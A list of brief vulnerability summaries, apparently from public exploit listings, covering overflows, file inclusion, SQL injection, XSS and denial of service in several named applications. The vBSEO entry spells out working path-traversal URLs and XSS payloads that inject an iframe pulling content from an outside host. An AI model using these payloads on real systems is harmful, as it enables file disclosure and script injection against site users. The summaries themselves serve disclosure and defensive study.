This is a remote buffer overflow exploit for SDP Downloader. It targets a vulnerability in the http_response function of the SDP Downloader application. The exploit sends a malicious HTTP request with a large payload of shellcode to the vulnerable application. The shellcode is then executed, allowing the attacker to gain control of the system.
vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, and persistent and non-persistent XSS. Enumeration and confirmation of files can be done by accessing the URLs http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt and http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt. Non-persistent XSS can be done by accessing the URLs http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E and http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E. Path disclosure can be done by accessing the URLs http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php, http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php, and http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbblog.php.
vBSEO is prone to persistent XSS due to insufficient sanitization of the titles on external websites vBSEO reads. The following ModCP & AdminCP features are affected: 'Moderate LinkBacks', 'Incoming LinkBacks', 'Outgoing LinkBacks'. After the link is clicked, which the attacker has to do, vBSEO will initiate a GET request to the target and will then save the linkback, if enabled, in either the incoming linkback list or the moderation queue. By default all linkbacks are enabled, and this linkback is known as the 'RefBack'. (vBSEO checks the Referrer.)
This exploit allows an attacker to download a file from a vulnerable Caedo HTTPd Server v 0.5.1 ALPHA. The attacker can specify the file to be downloaded by providing the host, port, path and file name as arguments to the exploit.
MultiCMS is vulnerable to a File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'lng' parameter. This will allow the attacker to read arbitrary files on the server.
A-PDF All to MP3 Converter v.2.0.0 is vulnerable to a SEH overflow vulnerability. By crafting a .wav file and dragging it into the application, a calc.exe process can be spawned. This exploit was discovered by h1ch4m and was later modified by m0nna.
With the mhtml protocol handler, the file extension is ignored, so the attacker can rename the mhtml file to a *.jpg file, etc., then upload it to the target site. The mhtml file format is based only on CRLF, so if we can inject CRLF, the site may be attacked. The attacker can also use mhtml-file string injection to bypass X-Frame-Options.
Virtuosa Phoenix Edition 5.2 is vulnerable to a buffer overflow attack when importing a malicious ASX file. The vulnerability is caused due to a boundary error when handling the 'Ref' field of the ASX file. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted ASX file with an overly long string in the 'Ref' field.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'sbcat_id' parameter of the 'showcats.php' script. A remote attacker can execute arbitrary SQL commands in the application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.
Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of Service attacks. Sending an HTTP GET request with a broken Authorization header causes a device restart after ~60 seconds.